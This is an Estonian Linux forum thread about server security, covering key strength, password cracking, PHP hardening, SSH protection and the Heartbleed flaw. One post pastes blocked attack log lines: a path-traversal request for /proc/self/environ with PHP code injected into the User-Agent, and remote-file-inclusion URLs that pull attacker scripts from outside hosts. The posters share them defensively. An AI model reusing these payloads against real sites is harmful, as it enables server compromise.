Portaal Portaal Pingviini veeb foorumi pealeht
  Viki  |  IRC  |  Otsing  |  Küsimused ja vastused  |  Profiil  |  Privaatsõnumite vaatamiseks logi sisse  | Logi sisse või Registreeru
<empty>
Vaata järgmist teemat
Vaata eelmist teemat

Postita uus teemaVasta teemale
Autor Sõnum
johnsmith
Vana Pingviin
Vana Pingviin


Vanus: 50
Liitunud: 24.07.2006
Postitused: 714
Asukoht: Universum
Distributsioon: Ubuntu/Gentoo/FreeBSD
finland.gif
postituspostitatud: 09.11.2006, 00:15  postituse pealkiri:  (teema puudub)  

Tsitaat:

Ma võin nüüd mööda panna, aga kas mitte pole avaliku-salajase võtme põhise krüptograafia "muukimatus" (erinevalt ühe võtmega krüptost) matemaatiliselt tõestamata? Smile Ja kuidas nende kvantarvutite tulek seda mõjutama pidi?
.


Täitsa õige, me ei tea kas on mingi tagauks algoritmi näol olemas.
Ma küll usun, et me saame sellest ka teada sellega ju tegeletakse kogu aeg.
Praegu teadaolevalt tuleb siiski kasutada katse eksituse meetodit korrutades kahte algarvu omavahel ja võrreldes tulemust kräkitava avaliku võtmega.
2048 bitist avalikku võtit võib võrrelda tugevuselt 128 bitise sümeetrilise võtmega. Minu teada on murtud mingi 50 bitine sümmeetriline võti aga probleem on selles, et võti tugevneb potensis- 90bitine võti = 2 potensis 90 aga 128 bitine võti on juba 2 potensis 128.

Asümmeetrilist võtit 1024 bitti loetakse praegu veel küllalt tugevaks. Pealegi ei anna mingi krüpteering nagunii 100% kaitset. Kassakappidele antakse ju ka turvasertifikaat selle järgi kui palju ja milliseid vahendeid ja aega läks kapi lahtisaamiseks. Kassakapid läbivad testi kus lukksepad üritavad kappi lahti saada ja olenevalt sellest kui raske on kappi lahti saada võtavad lukksepad järjest karmimad riistad kasutusele kuni kapp saadakse lahti.

Avalik võti toimibki sarnaselt id kaardile, sul on midagi mida teistel pole kuigi jah avalikust võtmest on võimalik teoreetiliselt salajase võtme välja arvutada.
Peab lihtsalt ära ootama millal pea sisse implantaadina mikrokiip pannakse siis pole muud kui paned pea lugejasse ja logid sisse.


markus
Pingviini kasutaja
Pingviini kasutaja


Vanus: 39
Liitunud: 11.08.2006
Postitused: 43
Asukoht: Tartu
Distributsioon: Gentoo
blank.gif
postituspostitatud: 09.11.2006, 11:29  postituse pealkiri:  (teema puudub)  

Gaimile on olemas selline 22rmiselt tore plugin, nagu Off-the-record Messaging.


uniz
Vana Pingviin
Vana Pingviin


Vanus: 45
Liitunud: 18.05.2006
Postitused: 764

Distributsioon: ubuntucare
estonia.gif
postituspostitatud: 09.11.2006, 15:37  postituse pealkiri:  (teema puudub)  

Näiteks kombinatsioon 6 numbrist ja tähest on ära arvatav 5 minutiga ja 16 sekundiga.

http://pingviin.org/album_showpage.php?full=&pic_id=103

1 miljard ja 400 miljonit parooli 5 minutiga on minu masina rekord.


olavsu1


Vana Pingviin
Vana Pingviin


Vanus: 49
Liitunud: 01.12.2006
Postitused: 923

Distributsioon: ubuntu, mandriva
estonia.gif
postituspostitatud: 24.11.2008, 15:51  postituse pealkiri:  (teema puudub)  

kuna minu enda servu pihta tehakse enamuses remote file inclusion attack'i

siis leitsin sellise koha http://www.webmasterworld.com/apache/3448091.htm

seal soovitatakse lisaks htacces falile veel php.ini fali muuta

register_globals = Off
allow_url_fopen = Off

// ise peaksin vist rahukiult hingata saama.

_________________
olen Troll ja ootan pingviin.org konto sulgemist.

JannoT
Pingviini kasutaja
Pingviini kasutaja



Liitunud: 10.05.2008
Postitused: 63
Asukoht: Tallinn
Distributsioon: Arch
estonia.gif
postituspostitatud: 24.11.2008, 17:27  postituse pealkiri:  (teema puudub)  

olavsu1 kirjutas:
kuna minu enda servu pihta tehakse enamuses remote file inclusion attack'i

siis leitsin sellise koha http://www.webmasterworld.com/apache/3448091.htm

seal soovitatakse lisaks htacces falile veel php.ini fali muuta

register_globals = Off
allow_url_fopen = Off

// ise peaksin vist rahukiult hingata saama.


Sul oli register globals on? :O See on üks suurimaid turvavigasid üldse ju. Razz
Vähemalt php 6 kaob antud valik ära. (Y) Register globals peaks ikka off olema koguaeg.


olavsu1


Vana Pingviin
Vana Pingviin


Vanus: 49
Liitunud: 01.12.2006
Postitused: 923

Distributsioon: ubuntu, mandriva
estonia.gif
postituspostitatud: 24.11.2008, 17:32  postituse pealkiri:  (teema puudub)  

Tsitaat:
Sul oli register globals on? :O See on üks suurimaid turvavigasid üldse ju.


ei, mul oli too teine asi sees.

Kood:
srv014.infobox.ru - - [24/Nov/2008:20:38:50 +0200] "GET //index.php?option=com_custompages&cpage=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 403 999 \-" "XXX<? echo \"w0000t\"; ?>XXX" ClientIP: 77.221.130.14
srv014.infobox.ru - - [24/Nov/2008:20:38:50 +0200] "GET //index.php?option=com_custompages&cpage=http://www.lesovik.de/files/i?? HTTP/1.1" 403 999 \-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" ClientIP: 77.221.130.14
srv014.infobox.ru - - [24/Nov/2008:20:38:50 +0200] "GET /errors.php?error=http://www.lesovik.de/files/i?? HTTP/1.1" 403 999 \-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" ClientIP: 77.221.130.14


peab ikka maailm haigeid täis olema .... zombistatud arvutid zombistatud serverid... korra uurisin kuhu nood CLI failikesed pandud on, täiesti süütukestesse joomla ja phpBBx baasil foorumitesse.


WOW kellegil on suudetud Linux tuuri panna. vaevalt, et linuxi kasutaja hakkaks ise põrsatempe tegema.
Kood:
76.9.3.130 - - [25/Nov/2008:01:29:38 +0200] "GET /logi.htm/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.excelsiorfm.com.br/images/idne.txt??%0D? HTTP/1.1" 403 999 \-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" ClientIP: 76.9.3.130
76.9.3.130 - - [25/Nov/2008:01:29:38 +0200] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.excelsiorfm.com.br/images/idne.txt??%0D? HTTP/1.1" 403 999 \-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" ClientIP: 76.9.3.130

_________________
olen Troll ja ootan pingviin.org konto sulgemist.

pisi
Pingviini kasutaja
Pingviini kasutaja



Liitunud: 09.07.2007
Postitused: 65
Asukoht: Eesti
Distributsioon: Debian / Darwin
estonia.gif
postituspostitatud: 15.11.2009, 21:14  postituse pealkiri:  (teema puudub)  

Kui vähegi võimalik, lubada ainult RSA autentimine (sshd_config failis RSAAuthentication yes ja kõik muud *Authentication no). Nagistamine on siis pigem tüütu kui ohtlik, nagistamise tüütuse vastu aitab SSH pordi muutmine.

Lisaks, kui kasutajate hulk on piiratud ja nad on tehniliselt võimekamad, võib mõelda ainult ID-kaardi võtmetega ligipääsu lubamisele. See tagab selle, et kellegi nõrgalt valvatud kliendimasinast võtmed pihta pannakse.

_________________
pisi - muidumees ja maailmaparandaja
@MartinPaljak.net

laurivosandi
Moderaator
Moderaator


Vanus: 36
Liitunud: 08.07.2005
Postitused: 647
Asukoht: Tallinn
Distributsioon: Estobuntu, Debian
estonia.gif
postituspostitatud: 15.11.2009, 23:54  postituse pealkiri:  (teema puudub)  

Tere,

soovitaks paigaldada inimestel:

denyhosts - a utility to help sys admins thwart ssh crackers

ehk:

sudo apt-get install denyhosts

Skaneerib ssh logisid ja paneb ründajate IP-d kohe /etc/hosts.deny faili

Lauri


obundra
Vana Pingviin
Vana Pingviin


Vanus: 50
Liitunud: 04.08.2005
Postitused: 1213
Asukoht: 127.0.0.1
Distributsioon: RHEL, Solaris, Debian, Gentoo
estonia.gif
postituspostitatud: 09.04.2014, 15:14  postituse pealkiri:  (teema puudub)  

Avastati ohtlik turvaauk OpenSSL-is, rohkem infot http://heartbleed.com
Juba on olemas ka uuendused, milles viga parandatud, laske oma pakihalduril uuendada OpenSSL 1.0.1g peale või kui see pole võimalik, siis tuleks OpenSSL ümber kompileerida suvandiga -DOPENSSL_NO_HEARTBEATS.
Haavatavust saab lihtsalt testida skripti abil, https://gist.github.com/sh1n0b1/10100394
Kood:
./ssltest.py serverinimi -p 443

Haavatavad on:
OpenSSL 1.0.1 kuni 1.0.1f , OpenSSL 1.0.2-beta ja 1.0.2-beta1
Haavatavad pole:
OpenSSL 1.0.0
OpenSSL 0.9.8-beta1

E: Väike tähelepanek Debian wheezy puhul.Viga on parandatud alates versioonist openssl 1.0.1e-2+deb7u5.Kui uuendada ainult openssl pakk, siis sellest ei piisa.Eraldi tuleb uuendada ka libssl pakk, kuna uuendades ainult openssl pakki versioonile 1.0.1e-2+deb7u6, jäetakse libssl uuendamata, sest openssl 1.0.1e-2+deb7u6 sõltub libssl1.0.0>=1.0.1 ja see tingimus on täidetud.

_________________
IT teenused



Viimati muutis obundra 09.04.2014, 16:32; muudetud 1 kord
sander85
Vana Pingviin
Vana Pingviin


Vanus: 39
Liitunud: 08.08.2005
Postitused: 4359
Asukoht: Tallinn (vahel ka Virtsu)
Distributsioon: Mageia, Debian, CentOS
estonia.gif
postituspostitatud: 09.04.2014, 15:22  postituse pealkiri:  (teema puudub)  

obundra kirjutas:
Avastati ohtlik turvaauk OpenSSL-is, rohkem infot http://heartbleed.com
Juba on olemas ka uuendused, milles viga parandatud, laske oma pakihalduril uuendada OpenSSL 1.0.1g peale või kui see pole võimalik, siis tuleks OpenSSL ümber kompileerida suvandiga -DOPENSSL_NO_HEARTBEATS.
Haavatavust saab lihtsalt testida skripti abil, https://gist.github.com/sh1n0b1/10100394
Kood:
./ssltest.py serverinimi -p 443

Haavatavad on:
OpenSSL 1.0.1 kuni 1.0.1f , OpenSSL 1.0.2-beta ja 1.0.2-beta1
Haavatavad pole:
OpenSSL 1.0.0
OpenSSL 0.9.8-beta1


Peale teekide uuendamist tuleb kindlasti ka kontrollida, et kõik vajalikud teenused (nt apache, postfix jne) saaks taaskäivitatud.

_________________
Image Image Image

imre
Vana Pingviin
Vana Pingviin



Liitunud: 16.08.2005
Postitused: 2648
Asukoht: Saku kant
Distributsioon: Ubuntu
estonia.gif
postituspostitatud: 09.04.2014, 18:05  postituse pealkiri:  (teema puudub)  

Lihtsam on kontrollida SIIT lehelt

_________________
Enne teema püstitamist kasutage OTSINGUT
Küsi targalt: Infot siit!
Kui aru ei saa, siis küsi.

rastik
Pingviini külastaja
Pingviini külastaja



Liitunud: 27.03.2014
Postitused: 19

Distributsioon: Trisquel Gnu/Linux
blank.gif
postituspostitatud: 10.04.2014, 01:50  postituse pealkiri:  (teema puudub)  

v6sa kirjutas:
Tere,

soovitaks paigaldada inimestel:

denyhosts - a utility to help sys admins thwart ssh crackers

ehk:

sudo apt-get install denyhosts

Skaneerib ssh logisid ja paneb ründajate IP-d kohe /etc/hosts.deny faili

Lauri

Olen ka denyhosts kasutamise poolt ssh serveris, kuid sellest ei ole kasu kui krüpteeritud teenust üle võrgu pealt kuulatakse.

Parem on hoopis tulemüüri reeglites või ssh seadistusfailis lubada ainult teatud ip aadressid.


Näita (aja järgi):      
Postita uus teemaVasta teemale


Vaata järgmist teemat
Vaata eelmist teemat
Powered by phpBB2 Plus based on phpBB © 2001/7 phpBB Group